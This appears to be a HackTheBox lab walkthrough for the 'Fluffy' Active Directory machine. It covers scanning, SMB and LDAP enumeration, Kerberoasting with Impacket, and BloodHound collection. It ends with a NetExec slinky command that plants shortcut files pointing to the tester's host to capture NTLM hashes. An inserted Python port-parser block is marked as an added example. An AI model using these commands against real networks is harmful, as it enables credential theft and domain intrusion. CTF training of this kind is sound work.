๐ŸƒFluffy

As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

Overview

Fluffy is an easy Windows machine from HackTheBox. This box is an Active Directory challenge that covers certificate abuse, the Shadow Credentials attack, AD CS attacks, and more.

rustscan --addresses 10.10.11.69 --ulimit 5000 -- -A -sC -Pn -sV -oN rustscan.md

53/tcp filtered domain no-response
88/tcp filtered kerberos-sec no-response
139/tcp filtered netbios-ssn no-response
389/tcp filtered ldap no-response
445/tcp filtered microsoft-ds no-response
464/tcp filtered kpasswd5 no-response
593/tcp filtered http-rpc-epmap no-response
636/tcp filtered ldapssl no-response
3269/tcp filtered globalcatLDAPssl no-response

nmap -sCV -Pn -oN nmap 10.10.11.69

nmap -T4 -p- -A -Pn -oA nmap.scan 10.10.11.69

nmap -sV -sC -oA initial -Pn 10.10.11.69

nmap -Pn -A -p 53,88,139,445,464,389,636,593,5985,3268,3269 10.10.11.69 -T5

The scan reveals the domain fluffy.htb and the domain controller hostname DC01.fluffy.htb.

We will add both to the hosts file:

echo -e '10.129.244.22\t\tDC01.fluffy.htb fluffy.htb' | sudo tee -a /etc/hosts

Analysis:
  • 53/tcp (DNS): Handles domain name resolution; check for zone transfer misconfigurations.

  • 88/tcp (Kerberos): Confirms Active Directory; use for Kerberos user enumeration or ticket attacks.

  • 139/tcp (NetBIOS-SSN): Legacy Windows file/printer sharing; enumerate shares and sessions.

  • 389/tcp (LDAP): Queryable directory service; useful for enumerating AD users, groups, and policies.

  • 445/tcp (SMB): Provides file sharing and remote management; test for SMB enumeration and null sessions.

  • 464/tcp (kpasswd5): Kerberos password change service; abusable in AS-REP roasting or password reset attacks.

  • 636/tcp (LDAPS): Encrypted LDAP; secure channel for directory queries, still useful for enumeration if authenticated.

  • 3269/tcp (GC over SSL): Global Catalog LDAP over SSL; enables cross-domain AD enumeration.
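As an added example (not part of the original writeup), here is a small Python parser for the port lines in the scan output above. It turns each `<port>/<proto> <state> <service> [<reason>]` line into a record and reports whether the set of services matches the Active Directory domain controller fingerprint described in the analysis; the sample lines are constructed from the scan above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: the port lines from the rustscan/nmap run above, one per line.
SAMPLE_SCAN = """\
53/tcp filtered domain no-response
88/tcp filtered kerberos-sec no-response
139/tcp filtered netbios-ssn no-response
389/tcp filtered ldap no-response
445/tcp filtered microsoft-ds no-response
464/tcp filtered kpasswd5 no-response
593/tcp filtered http-rpc-epmap no-response
636/tcp filtered ldapssl no-response
3269/tcp filtered globalcatLDAPssl no-response
"""
# "<port>/<proto> <state> <service> [<reason>]" as printed by nmap and rustscan.
LINE_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<reason>\S+))?$"
)
# TCP ports that, seen together, fingerprint an Active Directory domain controller.
DC_PORTS = {88: "Kerberos", 389: "LDAP", 445: "SMB", 464: "kpasswd", 636: "LDAPS",
            3268: "Global Catalog", 3269: "Global Catalog over SSL"}


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    reason: Optional[str]


def parse_scan(text: str) -> List[PortRecord]:
    """Parse scan output into records, skipping headers and garbled lines."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append(PortRecord(int(m["port"]), m["proto"], m["state"],
                                      m["service"], m["reason"]))
    return records


def looks_like_domain_controller(records: List[PortRecord], minimum: int = 3) -> Tuple[bool, List[str]]:
    """True when at least `minimum` DC ports were seen. The run above reported them as
    'filtered' (scanned with -Pn, no response), so open and filtered both count."""
    seen = {r.port for r in records if r.proto == "tcp" and r.state in ("open", "filtered")}
    hits = sorted(seen & set(DC_PORTS))
    return len(hits) >= minimum, [DC_PORTS[p] for p in hits]
```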

SMB Enumeration

nxc smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!'

nxc smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --users

Save the enumerated users to a file for later use.

nxc smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --shares

  • First, I validated the obtained credentials to confirm they were correct (as expected for official Hack The Box credentials).

  • Although Kerberos authentication is often required, in this case the credentials worked without issue.

  • Next, I performed additional user enumeration.

  • Enumerating users is important because:

    • Any Active Directory user can potentially aid exploitation.

    • Random user accounts are useful for password spraying.

    • Some accounts may be Kerberoastable or AS-REP Roastable.

  • Afterward, I enumerated available SMB shares.

  • A default share named IT was identified, which warranted further inspection.

  • Before examining files within the share, I first checked for:

    • Kerberoasting opportunities

    • AS-REP Roasting opportunities

  • I demonstrate two approaches for this:

    • One using NetExec

    • One using Impacket

To use impacket-GetUserSPNs over Kerberos, you have to obtain a ticket first, so let's get our TGT and then check whether there are Kerberoastable or AS-REP-roastable users. You can use just impacket-GetUserSPNs for both, because it detects these two attacks thanks to this research.

impacket-getTGT fluffy.htb/j.fleischman:'J0elTHEM4n1990!' -dc-ip 10.10.11.69

If the request fails with a clock-skew error (KRB_AP_ERR_SKEW), synchronise the local clock with the DC and retry:

ntpdate 10.10.11.69

impacket-getTGT fluffy.htb/j.fleischman:'J0elTHEM4n1990!' -dc-ip 10.10.11.69

export KRB5CCNAME=j.fleischman.ccache

impacket-GetUserSPNs -request -dc-ip 10.10.11.69 fluffy.htb/j.fleischman:'J0elTHEM4n1990!'

I was not able to crack the hash, so I will try the SMB shares next.

smbclientng -d "fluffy.htb" -u 'j.fleischman' -p 'J0elTHEM4n1990!' --host 10.10.11.69

I chose to use smbclient-ng this time because of its clean organization. Since the share contained many files, I downloaded them all for review, and among them I discovered upgrade_Notice.pdf, a pentesting report that turned out to be a goldmine of information and prompted me to search for exploit PoCs for the referenced CVEs.

smbmap -d fluffy.htb -H 10.10.11.69 -u j.fleischman -p "J0elTHEM4n1990!"

smbclient -U 'FLUFFY.HTB/j.fleischman%J0elTHEM4n1990!' -L //DC01.fluffy.htb

smbclient -U 'FLUFFY.HTB/j.fleischman%J0elTHEM4n1990!' //DC01.fluffy.htb/IT

We can both upload to and download from the IT share.

enum4linux-ng -A fluffy.htb -u FLUFFY/j.fleischman -p 'J0elTHEM4n1990!'

TCP/389 - LdapDomainDump

ldapdomaindump -u 'FLUFFY.HTB\j.fleischman' -p 'J0elTHEM4n1990!' -o ldd 10.10.11.69

Identify interesting users and groups

BloodHound data collection command (via NetExec):

nxc ldap DC01.fluffy.htb -d 'fluffy.htb' -u 'j.fleischman' -p 'J0elTHEM4n1990!' --bloodhound -c All --dns-server 10.10.11.69

nxc smb 10.10.11.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!' -M slinky -o SERVER=10.10.16.8 NAME=lookhere
